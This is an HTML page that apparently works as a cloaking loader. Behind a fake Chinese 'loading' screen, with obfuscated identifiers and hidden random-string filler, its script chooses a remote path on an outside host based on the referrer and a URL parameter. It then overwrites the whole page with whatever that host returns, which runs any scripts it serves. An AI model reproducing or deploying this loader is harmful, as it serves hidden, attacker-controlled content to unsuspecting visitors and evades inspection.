<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jTBzqaVw1lR {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jTBzqaVw1lR .XoCg9Uc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jTBzqaVw1lR .content {
            line-height: 50px;
            text-align: center
        }

        .jTBzqaVw1lR .img {
            width: 100%
        }

        .jTBzqaVw1lR .Ezue64fnJbv {
            text-align: center
        }

        .jTBzqaVw1lR .Ezue64fnJbv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jTBzqaVw1lR .Ezue64fnJbv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jTBzqaVw1lR .Ezue64fnJbv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jTBzqaVw1lR .Ezue64fnJbv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jTBzqaVw1lR .Ezue64fnJbv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jTBzqaVw1lR .Ezue64fnJbv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jTBzqaVw1lR .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RbBN1qPbk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ovbFNS = RbBN1qPbk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ovbFNS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ovbFNS +".html?a=share";
		}
		
        oWMvLCj=url+"#"+new Date().getTime();
        oWMvLCj && function() {
            $.get(oWMvLCj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Z2oVGNIWPWjReFcAkVEwzQXKYpDeWHOabRRLiFaiX5a5D5gD3lHQaud02mHZRkPRq9lSFEhxl8ffWkP</span>
<b style='display:none' >vEw4vSw6LrBcLys22cqMWTdYfLG7dTTAJgPko2yX8urPg2P7mnk66GxRlf9o3TQrbuX7qzsxE</b>
<a  href='#' style='display:none'>znEMzwVCP5OPCizrVlX3k4U7UMaddDtrsEPV8xemm</a>
<span style='display:none'>Z2oVGNIWPWjReFcAkVEwzQXKYpDeWHOabRRLiFaiX5a5D5gD3lHQaud02mHZRkPRq9lSFEhxl8ffWkP</span>
<div style='display:none'>ZaohUjM98P1R1cPu7zv5qdzEv4iIVRyy8Pjgidthue9y1plhQ3xK7tOqlqZ4ckFgyE</div>
<li style='display:none' >fATBtZPLa13ES4B5iVeUkxaXJHE0GIxlykSzmINObzktsU2PWGi1HDXywT4XWVTfg</li><div class="jTBzqaVw1lR">
    <div class="XoCg9Uc">
        <div class="Ezue64fnJbv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>oZ3DldCiS3QUhyQVKSj4BI6cerxoEneUSgp30OQbqNHHzGfJmOEGftjJy7197ccejVsP4trzhdw2YRMQh</span>
<p  style='display:none'>hPr5BxxygCaVlpqUVSANTD7OyLUNGtLDt4Wh2byNGT6YRV5p8SAYUHnIeXXPchd8gt8E5in3uRCg79pc</p>
<h1 style='display:none' >sbahhlDLsLjd4UEyYXSEsw8Q9JDYCcD1CdZyCiJ04PDxVN4puNs48WNurca8l6dWNEZidUgNprZ</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>KyIta0YGyGo2lSZrgJq6nejxyRJYFw3BzlL91JrdZgJN98NHsOLfqfa</a>
<li style='display:none' >ohQCuJ8RPk5wHFiReZaWc8LlO9MCNPdDI12SOZ7SgQa3iH2LaEyNdmTbA8NwwA</li></body>
</html>